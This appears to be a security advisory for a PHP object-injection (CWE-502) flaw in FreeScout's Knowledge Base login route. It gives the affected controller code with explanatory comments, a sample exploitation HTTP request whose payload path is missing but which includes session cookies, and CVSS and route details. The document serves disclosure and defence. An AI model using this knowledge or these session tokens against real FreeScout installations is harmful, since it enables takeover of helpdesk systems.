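public function customerLoginFromEmail(Request $request, $mailbox_id, $customer_id, $hash, $timestamp)
{
    // Generic failure payload. It is returned for every rejected link so the
    // response does not reveal which segment of the link was wrong.
    $result = [
        'result' => 'error',
        'message' => __('Invalid authentication link'),
    ];

    $mailbox = $this->processMailboxId($mailbox_id);
    if (!$mailbox) {
        abort(404);
    }

    // SECURITY (CWE-502): $customer_id and $timestamp are taken verbatim from
    // the URL. \Helper::decrypt presumably wraps Laravel's Crypt::decrypt,
    // which unserialize()s the decrypted payload, so anyone holding APP_KEY
    // can smuggle arbitrary objects in (PHP object injection). The scalar
    // check below keeps injected objects out of \Kb::authenticate, but magic
    // methods (__wakeup/__destruct) still fire inside unserialize(); the real
    // fix is to decrypt WITHOUT unserializing (decryptString-style helper) —
    // TODO confirm Helper::decrypt's implementation and switch it.
    try {
        $customer_id = \Helper::decrypt($customer_id);
        $timestamp = \Helper::decrypt($timestamp);
    } catch (\Exception $e) {
        // A tampered or foreign ciphertext fails the MAC check in Laravel's
        // decrypter. If Helper::decrypt propagates that exception, a forged
        // link must read as "invalid link", not as a server error.
        return view('knowledgebase::customer_login', [
            'mailbox' => $mailbox,
            'result' => $result,
        ]);
    }

    // A legitimate link decrypts to plain scalars (an id and a timestamp).
    // Anything else — null from a failed decrypt, an array, or an injected
    // object — is refused before it can influence authentication.
    if (!is_scalar($customer_id) || !is_scalar($timestamp)) {
        return view('knowledgebase::customer_login', [
            'mailbox' => $mailbox,
            'result' => $result,
        ]);
    }

    try {
        $auth_redirect = \Kb::authenticate($customer_id, $mailbox->id, $hash, $timestamp);
        if ($auth_redirect) {
            return $auth_redirect;
        }
    } catch (\Exception $e) {
        // Exceptions with code 300 appear to carry a message meant for the
        // end user; every other failure keeps the generic text above.
        if ($e->getCode() == 300) {
            $result['message'] = $e->getMessage();
        }
    }

    return view('knowledgebase::customer_login', [
        'mailbox' => $mailbox,
        'result' => $result,
    ]);
}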
GET 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 HTTP/1.1
Host: freescout.web-hacks.ru
Cookie: laravel_session=eyJpdiI6IjNqYTM3SjB1S3htZnZaZG9tWEZcL3VnPT0iLCJ2YWx1ZSI6IjVtRFhvaXlVV1FjdkpqdVRrTnU4dTBZQSswODNERzdyanZvdjZTaytWeExveFNJUUhPdEJGbzNyXC9vYU5tVUo1NjNxT1dtTlwvb0pLcGxSQWdseVlIeVpMTnNKcFlEbEtMbTdtMVJaTWFpdHp3QUZxSUNlQlBkN0lKMjl5SVNYNU8iLCJtYWMiOiI1MDE5ZjNhNTlhZWU5NGQ0Yzc1NDY2Y2Q2ZWU2Y2I5OTE2MzhlNWNiZjMxZGE2ZWI2NWFkMDQwMDY5NjMxZGVkIn0%3D; enduserportal_auth=eyJpdiI6InJVZGRXSzZlWkIwZGlcL2FlZ3lraDVBPT0iLCJ2YWx1ZSI6IkFPc1BjVUZVZHBXUVRzZEZaeTVoWGc3Z3V4SklvYVhjSTVQbkJHNmgxVHk5aDMrd1JyRTM4U3pmdERtdk9YblBDd0Q1dnQwWWd6UHFDeURjek12d1cxbVVkOG9DQlMrKzhmcnhZYWxHZm1VeDJHeE9iRENRcDlFcUxcL0pFdTJDMkhMMHhtUnJYWkczV0FLT3E5MGxyc2VZOVR3WUpINHIyZld0SlI2bEZVdXljZmowZ1wvNDJBQ24wbFwvcVIxMnluRVhyVVNlUDcwaXBGcU5QU0xGU0s1dzQ2T0FPTmJlTTFacDZJc0ZmaHlXU3VkRHl4alBhM3BCMVZxVTBcL0QydkV4d0xrdEMxSDlOZjhRZks4VWMyc3VSZ05lZ2xxME1uNjJBMFRRNTU5YUFEaFlvU1I0dDhLVFhiSUNNWEFcLzFYTVFwUnVUakVGYWRvNVg1NzhPUFZTMGVaVDMwY3pibDFTOHpQYXBrM0pTS2VVPSIsIm1hYyI6IjQzZmQ3YzYxMTc1YzQwZDYzNGFhZTM2YWUxMmM1Nzg2ZjA1ZmI1YzcxZjc5NGYxOTA0NGQ0NzJlMmY2ZmU3NWMifQ%3D%3D; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IkNQRTJZZlhZQ0RPU2tYbnhnMHpqMkE9PSIsInZhbHVlIjoib3RRVXlScmZlWE5jSjNIYTFXcGQ5RWV2N1JSTGkxMlwvT3JXT2JtR1dMWDRZcUJNdEh0SnUzNEdHcU5CREcxV3hiZnhxRm0zRlMxUmxwKzdsXC84QitVODdFYTZpTG1ERFZPQWs4c3lOZVJaeGE2MWx6K21WcUtxdHR5MlB0Q3JINkk1NWFkbHNCMXN6NFg3czRzVVRkZzNcL0w0SVwvTjBUXC9yZkJPUjJEVExYS005UHkrTFBVRW5KdENBRTFhU25MRXh4dHdiZFlPXC9vREJiWURGeW1lQms3d01CVDVTVFQySCtKQ0dubXROYlE5MD0iLCJtYWMiOiI4YzMwMWQ4NTc4YWE4YmEwZWI1MmMyMjUxMWRjOTc4NjNhNzE3MjkzM2M4NGIwYWMwNmI3MGY4YmE5OTc1NTQ3In0%3D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
Deserialization of untrusted data leads to Remote code execution [4]
Product: FreeScout
Version: 1.8.182
CWE-ID:
• CWE-502: Deserialization of Untrusted Data
• CAPEC-586: Object Injection
CVSS v4.0 score: 7.0 (vector: AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N)
Description: The application decrypts the customer_id and timestamp URL segments and then deserializes the result, so the data is controllable by anyone who can produce a valid ciphertext — i.e. who holds APP_KEY. Such an attacker can instantiate objects of arbitrary classes with fully controlled properties (PHP object injection), which allows manipulation of the web application's logic and, through a suitable gadget chain, remote code execution.
Vulnerable routes:
• /hc/{mailbox_id}/auth/{customer_id}/{hash}/{timestamp}
• /{kb_locale}/hc/{mailbox_id}/auth/{customer_id}/{hash}/{timestamp}
Vulnerable parameters:
• GET timestamp
• GET customer_id
Exploitation conditions: administrator privileges, knowledge of APP_KEY (needed to produce a payload that passes decryption), and the Knowledge Base module installed
Researchers: Daniil Satyaev, Roman Cheremnykh, Artem Danilov (Positive Technologies)
Research
Vulnerable code:
Listing: code calling the vulnerable function Helper::decrypt on the attacker-controlled customer_id and timestamp route parameters (Modules\KnowledgeBase\Http\Controllers\KnowledgeBaseController.php)
Exploitation scenario:
Listing: HTTP request used to exploit «Deserialization of untrusted data» (the request path, which carries the crafted customer_id and timestamp segments, is redacted above)